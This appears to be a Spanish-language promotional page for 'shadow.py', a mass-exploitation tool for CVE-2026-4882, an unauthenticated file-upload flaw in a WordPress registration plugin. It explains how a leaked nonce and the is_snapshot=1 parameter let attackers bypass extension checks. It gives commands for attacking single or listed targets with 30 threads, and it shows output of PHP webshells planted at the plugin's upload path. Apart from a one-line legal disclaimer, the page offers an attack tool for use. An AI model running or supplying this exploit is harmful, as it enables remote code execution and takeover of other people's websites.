
User Registration Advanced Fields <= 1.6.20 - Subida de archivos arbitraria no autenticada
User Registration Advanced Fields <= 1.6.20 - Subida Arbitraria de Archivos No Autenticada
User Registration Advanced Fields <= 1.6.20 - Subida Arbitraria de Archivos No Autenticada
Descripción
El plugin User Registration Advanced Fields para WordPress (versiones hasta la 1.6.20 inclusive) es vulnerable a la subida arbitraria de archivos no autenticada a través de la acción AJAX uraf_profile_picture_upload_method_upload. El plugin filtra un nonce válido mediante wp_localize_script() en cualquier página que contenga un formulario de registro, y el uso del parámetro is_snapshot=1 omite por completo la validación de extensiones de archivo. Esto permite a atacantes no autenticados subir archivos arbitrarios (p. ej., webshells PHP disfrazadas de imágenes GIF), que se almacenan en wp-content/uploads/user_registration_uploads/temp-uploads/, lo que conduce a la ejecución remota de código (RCE) total.
~ Puntuación CVSS: 9.8 (Crítico)
~ Versiones afectadas: <= 1.6.20
Objetivo único :
python3 shadow.py -u https://target.com -s shadow.phpMúltiples objetivos :
python3 shadow.py -f targets.txt -s shadow.php -t 30Modo interactivo :
python3 shadow.py
╔══════════════════════════════════════════════════╗
║ CVE-2026-4882 — Full Auto Exploit ║
║ User Registration Advanced Fields <= 1.6.20 ║
║ by: Shadow x Friska 😈🔥 ║
╚══════════════════════════════════════════════════╝
═══ Interactive Mode ═══
📄 Target file (e.g. targets.txt): list.txt
⚡ Threads 1-50 (default 30): 30
🎯 Targets : 75
📁 Shell : shadow.php
⚡ Threads : 30
💣 Brute : 1-500
🩷 [3/75] http://target.com
→ http://target.com/wp-content/uploads/user_registration_uploads/temp-uploads/shadow.php
💀 [1/75] http://example.com — no nonce
❌ [4/75] http://example2.com — upload failed
El uso no autorizado de sistemas que no posees o sobre los que no tienes permiso para realizar pruebas es ilegal.